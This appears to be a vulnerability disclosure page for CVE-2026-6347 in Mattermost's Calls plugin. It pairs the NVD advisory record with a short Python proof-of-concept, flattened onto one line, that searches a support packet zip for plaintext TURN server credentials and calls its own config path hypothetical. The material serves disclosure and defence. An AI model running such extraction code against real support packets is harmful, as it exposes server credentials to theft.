CVE-2026-6347

# Proof of Concept for CVE-2026-6347 # This script simulates extracting credentials from a Mattermost support packet. import zipfile import json import os def extract_turn_credentials(support_packet_path): """ Parses a Mattermost support packet to find TURN credentials. """ turn_creds = [] try: with zipfile.ZipFile(support_packet_path, 'r') as z: for filename in z.namelist(): if 'config' in filename.lower() and filename.endswith('.json'): with z.open(filename) as f: data = json.load(f) # Hypothetical path based on Mattermost config structure if 'PluginSettings' in data and 'mattermost' in data['PluginSettings']: calls_config = data['PluginSettings']['mattermost'].get('calls', {}) turn_secret = calls_config.get('TurnSecret') turn_uri = calls_config.get('TurnURI') if turn_secret or turn_uri: turn_creds.append({ 'file': filename, 'TurnURI': turn_uri, 'TurnSecret': turn_secret }) except Exception as e: print(f"Error: {e}") return turn_creds # Usage # creds = extract_turn_credentials('mattermost_support_packet.zip') # print(creds)

{"cve": {"id": "CVE-2026-6347", "sourceIdentifier": "[email protected]", "published": "2026-05-18T09:16:24.143", "lastModified": "2026-05-18T18:39:43.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to sanitize sensitive configuration fields in the Mattermost Calls plugin which allows an attacker with access to a support packet to obtain TURN server credentials via the plaintext values present in the exported plugin configuration.. Mattermost Advisory ID: MMSA-2026-00605"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.14", "matchCriteriaId": "413D9405-79C3-4299-B0DC-40D9EE5CC717"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.4", "matchCriteriaId": "CF171039-837A-4D23-87EB-F328AD04976C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.2", "matchCriteriaId": "726AD6AD-6C01-45BB-9115-B8209717A6D4"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}